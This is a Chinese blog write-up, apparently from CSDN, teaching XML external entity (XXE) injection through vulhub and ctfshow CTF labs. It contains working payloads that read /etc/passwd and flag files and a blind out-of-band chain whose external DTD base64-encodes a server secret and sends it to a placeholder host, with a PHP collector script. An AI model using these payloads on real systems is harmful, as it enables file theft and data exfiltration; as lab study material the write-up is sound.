xxe盲注

已于 2023-03-19 11:13:39 修改
阅读量882 收藏 2
点赞数 2
分类专栏: xxe 文章标签: php 开发语言
于 2023-03-18 18:11:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/129548189
版权
本文详细介绍了XML外部实体注入(XXE)的概念,包括内部实体、外部实体和参数实体的使用,以及如何通过它们来构造和利用XXE漏洞。文章通过实例展示了XXE如何从内部和外部引用实体,以及如何进行混合调用和盲注攻击。此外,还讨论了PHP环境下的XXE利用,包括libxml的安全设置和如何在无回显情况下构造XMLpayload。
摘要由CSDN通过智能技术生成

简单描述xxe:

内部声明实体,格式为

<?xml version="1.0"?>
<!DOCTYPE name[        //DTD内部声明
<!ENTITY errorr0   "hello world">    //DTD实体
]>
<user><username>&errorr0;</username><password>123</password></user>

引用外部实体

<?xml version="1.0"?>
<!DOCTYPE name[        //DTD内部声明
<!ENTITY errorr0  SYSTEM "http://127.0.0.1">    //DTD外部实体
]> 
<user><username>&errorr0;</username><password>123</password></user>

如何区分,一开始我也看不懂有啥区别,最后是啥发现了内部实体就是引用得值是已经定义好了,而外部实体的值就是通过某些函数比如system来获取,不是提前定义好的。

参数实体

上面的内部还是外部实体的值,都是再文档外面调用的,而如果我们想在里面调用,就需要用到参数实体。

<!ENTITY % 实体名称 "实体的值">

%实体名称 ;----- 相当于调用

<!DOCTYPE name[
<!ENTITY % a   "hello">
<!ENTITY % b  "&a; errorr0">
%b;
]>
 
 
最后输出的答案为:hello errorr0

 可以看出%b在dtd的里面。 

内部实体+参数实体混合调用

<?xml version="1.0"?>
<!DOCTYPE name[
<!ENTITY % errorr1 "<!ENTITY errorr2 'hello no'>">
%errorr1;
]>
 
<user><username>&errorr2;</username><password>123</password></user>

先调用参数实体,然后数据中又是一个实体,再在文档元素中调用&errorr2; 。

预定义实体,实体引入字符

当然除了这些,还有一种方式代替一些符号比如百分号%,参数实体的百分号%也不能出现在实体值中,这个时候我们可以用Unicode编码,%=&#37; 也可以写做16进制 ,%=&#37;=&#x25;

外部实体+参数实体的二重调用 

<?xml version="1.0"?>
<!DOCTYPE name[
<!ENTITY % errorr1 SYSTEM "http://127.0.0.1/flag.txt">
%errorr1;
%errorr;
]>
 
<user><username>&errorr2;</username><password>123</password></user>
 
 
 
 
flag.txt中内容如下:
 
<!ENTITY % errorr "<!ENTITY errorr2  'yes i am a flag'>">

盲注xxe

因为上面的都是有回显的题目都会有print或者echo之类输出的语句, 但是如果没有回显了怎么办呢?

构造的XML
 
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///D:/phpStudy/PHPTutorial/WWW/xxe/php_xxe/flag.XML">  //这是需要带出去的一串数据
<!ENTITY % remote SYSTEM "http://服务器IP/errorr.txt">  //服务器中放入嵌套数据
%remote;
%all;
]>
<root>&send;</root>
errorr.txt
 
<!ENTITY % all "<!ENTITY  send SYSTEM 'http://服务器IP地址/1.php?file=%file;'>">
1.php
 
 
<?php
file_put_contents("1.txt", $_GET['file']) ;
?>

其实就是通过了参数实体+外部实体,首先调用%romore获得errror.txt中的实体,然后调用%all获得了后面的send最后调用外部实体,调用了1.php中的内容,然后把file里面的数据放到了1.txt中,这样就把数据外带了。

因为DTD外部实体中带入的 SYSTEM 可以执行http:// 、 file:// 、 https:// ,因此不用怀疑,我们还能进行php://伪协议的利用,比如php://filter中我们可以用base64或者rot13编码一些文件或者网站的源码供我们读取。

XXE过滤ENTITY关键字

完全可以用上面的方式把ENITY放到,服务器上的一个文件中然后读取

复现的环境:

  • PHP 7.0.30
  • libxml 2.8.0
  • libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

这里就不细写知识点了,这个链接挺全的。主要通过题目和复现来逐渐理解。

首先复现vulhub上的php_xxe

环境搭建:找到php_xxe的 那个

 然后直接docker-compose up -d,然后访问8080端口就可以了。

(ps:一定保证8080的端口是空闲的,这里我的kali以前鼓捣过,8080端口开过apache信道服务,捣鼓不明白 只能重开一台kali)

目录下有dom.php、index.php、SimpleXMLElement.php、simplexml_load_string.php其中dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞。

dom.php: DOMDocument:: loadXML()//从字符串加载XML文档

<?php
$data = file_get_contents('php://input');

$dom = new DOMDocument();
$dom->loadXML($data);

print_r($dom);

 SimpleXMLElement.php:SimpleXMLElement类标识xml文档中的元素

<?php
$data=file_get_contents('php://input');
$xml=new SimpleXMLElent($data);

simplexml_load_string.php: simplexml_load_string()//接受格式正确的XML字符串,并将其作为对象返回

<?php
$data=file_get_contents('php://input');
$xml=simplexml_load_string($data);

echo $xml->name;

burp抓包进行修改,加入如下代码:这是使用的外部实体

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe[ 
	<!ELEMENT test ANY >	
	<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>	
<test>
	<name>&xxe;</name>					
</test>

 发现执行成功。

==============

web373

<?php
error_reporting(0);
libxml_disable_entity_loader(false); //允许加载外部实体
$xmlfile = file_get_contents('php://input');//xml文件来源于数据流
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
// 加载xml实体,参数为替代实体,加载外部子集
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;//结点嵌套
    echo $ctfshow;
}
highlight_file(__FILE__);

<?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE foo[
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///flag" >]>
  <creds>
    <ctfshow>&xxe;</ctfshow>
  </creds>

这里ctfshow的标签因为是结点嵌套所以必须存在,  然后&xxe后面的分号一定要有。

web374

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

这里没有print echo所以无回显,所以我们需要找个东西来外带我们要获取的数据。

evil.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/secret">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://x.x.x.x:9999/?p=%file;'>">
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [ 
<!ENTITY % dtd SYSTEM "http://x.x.x.x/evil.txt"> 
%dtd;%int;%send; ]>

需要在服务器上开启web功能。

过滤http头、xml这些可以换个编码绕过

ps感想:

弄这个apache搞了好几天一直报错,实在是顶不住了,如果有会的师傅可以滴滴我,感激不尽呀!!! 

偶尔躲躲乌云334
关注
专栏目录
【Java代码审计】XXE漏洞
大河之犬的博客
04-02 1344
XXE 漏洞的原理主要是利用了 XML 解析器的实体引用特性。在 XML 中,可以使用实体引用来引用外部的实体,例如文件,以便在 XML 文档中重用内容。然而,如果 XML 解析器未经适当配置,可能会导致外部实体的任意读取和执行,从而引发安全漏洞。攻击者可以构造恶意的 XML 文件,其中包含对外部实体的引用,并通过将这个 XML 文件提交给目标应用程序来触发漏洞。当目标应用程序解析这个 XML 文件时,解析器会尝试读取和解析外部实体,从而使得攻击者能够访问本地或远程系统上的文件,并执行相关操作。
WEB漏洞——XXE
qq_63594215的博客
04-12 950
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
xxe主看这个吧】xml --xxe 各种注入学习 也就一些基本的方法,再加一个 xxe盲注,vps外带的
Zero_Adam的博客
04-10 448
目录:一、基础知识:二、注入方法:1. 直接通过DTD外部实体声明2. 通过DTD文档引入外部DTD文档,再引入外部实体声明3. 通过DTD外部实体声明引入 外部实体声明三、产生的危害:1. 读取任意文件2. XXE无回显使用vps外带 一、基础知识: 基础看这篇就好 二、注入方法: 1. 直接通过DTD外部实体声明 内部实体声明,应该是无法触发xxe漏洞的,所以我们用的应该都是 外部实体声明。也就是 SYSTEM 后面的东西都是外部的url的东西?。。不是呀,这个应该就不影响了,只是 system 后面的
xxe主看这个1】学习xxe稍微进阶的知识 ---- OOB xxe盲注,外带
Zero_Adam的博客
04-12 1572
目录:1. 基本知识2.XML的安全性问题当文件内容和 xml 格式相冲突的时候,其他利用 https://www.freebuf.com/video/209186.html 这个是那个pvs的网站,要学习一下curl命令,然后就可以当作一个vps来用了 https://beeceptor.com/console/qwert 1. 基本知识 xml是一种可扩展标记语言,和html类似, 主要区别是 HTML 主要和 数据表示相关。而xml 更多与数据传输和存储有关。 xml可以用在这些地方,等等 我们现在
CTFshow-XXE笔记
最新发布
dasdasdasvsdV的博客
08-06 215
从 HTTP 请求的输入流中读取 XML 数据。发包。
XXE blind 简单poc & 读文件
3569
03-27 3203
原理简介: https://blog.csdn.net/u011721501/article/details/43775691 首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样 PHP 利用方式 读取文件POC 利用: 自己vps放置 xxe.xml <!ENTITY % payload SYSTEM "php://fil...
XXE漏洞(下)
errorr0
04-10 1074
XXE注入攻击
XML外部实体注入;XXE漏洞;XXE有回显注入;XXE无回显注入;Blind XXE;绕过方式总结
weixin_43749601的博客
03-30 3429
漏洞原理 XE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以加载恶意外部文件,造成文件读取、命令执行、内网端口扫描。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件 环境搭建 地址:https://github.com/c0ny1/xxe-lab 下载好后将PHP_XXE放到PHPstudy的www目录下就可以访问 XXE有回显注入 在登录处先抓一下包,可以看到是参数的传递格式是XML,可能存在XML注入。 将数据包发送到R
DoraBox 漏洞练习平台WriteUP.pdf
04-14
DoraBox 漏洞练习平台 WriteUP与总结。SQLi 数字型,数字型注入拼接语句一般为 select * from <表名> where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为...
xxe漏洞详解(xml外部实体注入)
糖小喵
05-24 957
前置知识 XML:XML使用DTD(document type definition)文档类型定义来组织数据,格式统一,跨平台和语言,早已成为业界公认的标准。XML是标准通用标记语言 (SGML) 的子集,非常适合 Web 传输。XML 提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 json:JavaScaript对象表示法(JavaScript Object Notation),是存储和交换文本信息的语法。具有文本量更小、更快和更易解析的特点。Json和HTML不一样,HTML主要.
xxe漏洞简介
u011066706的专栏
04-17 4148
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
mysql dba盲注_oracle 11g后db权限xxe盲注的快速获取大量数据的一些小技巧
weixin_31693157的博客
01-27 261
原标题:oracle 11g后db权限xxe盲注的快速获取大量数据的一些小技巧利用CVE-2014-6577。目标版本:11.2.0.3, 11.2.0.4, 12.1.0.1, 12.1.0.2,等(反正就是比较新的版本啦,对非dba用户的权限做了些许限制)。当然,如果你是dba权限注入点,或者可以union,error。可以直接跳过此文。dba权限的话:oracle盲注用http可以通杀一条龙...
XXE漏洞中DOCTYPE、ENTITY傻傻分不清-WEB安全基础入门—XML外部实体注入(XXE)
Eason_LYC安全白帽子的成长博客
07-20 2887
XML外部实体注入(XXE) WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏! 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6196
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
文件读取 xxe_XXE
weixin_36165398的博客
01-14 755
一、 XXE是什么?有哪些危害?XML外部实体,允许XML引用外部数据作为变量。形式如下。]><user><username>&xxe;username><password>adminpassword>user>由于外部实体允许多种协议,所以XXE等同于任意文件读取+SSRFXXE靶场https://github....
【渗透测试】惊!XXE原理利用你知道多少
kali_Ma的博客
06-11 679
XXE漏洞概念: XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念: XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成
Oracle盲注结合XXE漏洞远程获取数据
weixin_34033624的博客
03-08 596
crackershi · 2015/05/12 16:240x00 前言想必大家对SQL注入已经耳熟能详,对XML实体注入(简称XXE)也有所了解。本文主要讨论了一种在存在ORACLE盲注的情况下远程获取数据的方式。其实和UTL_HTTP远程获取的方法差不多,只不过原理不同。0x01 漏洞简析CVE-2014-6577,是Oracle在今年年初修补的XXE漏洞,已知受影响的范围:11.2.0.3,...
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值